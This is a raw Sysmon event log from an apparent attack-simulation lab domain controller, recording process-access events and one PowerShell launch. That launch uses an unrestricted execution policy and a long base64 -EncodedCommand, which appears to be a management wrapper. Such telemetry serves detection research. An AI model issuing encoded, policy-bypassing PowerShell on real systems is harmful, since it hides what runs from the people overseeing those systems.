10:39:16.906{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000339Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000338Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000337Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000336Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C5B-5F80-0500-000000007E01}6401216C:\Windows\system32\csrss.exe{733EE690-3DD4-5F80-0203-000000007E01}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000335Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000334Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000333Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3DD4-5F80-0103-000000007E01}46164628C:\Windows\system32\cmd.exe{733EE690-3DD4-5F80-0203-000000007E01}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000332Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000331Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000330Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.919{733EE690-3DD4-5F80-0203-000000007E01}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{733EE690-3DD4-5F80-0C83-110000000000}0x11830c0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{733EE690-3DD4-5F80-0103-000000007E01}4616C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000329Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C66-5F80-0B00-000000007E01}864584C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000328Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3DD4-5F80-0003-000000007E01}43881144C:\Windows\system32\conhost.exe{733EE690-3DD4-5F80-0103-000000007E01}4616C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000327Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000326Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000325Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000324Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:16.906{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000323Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 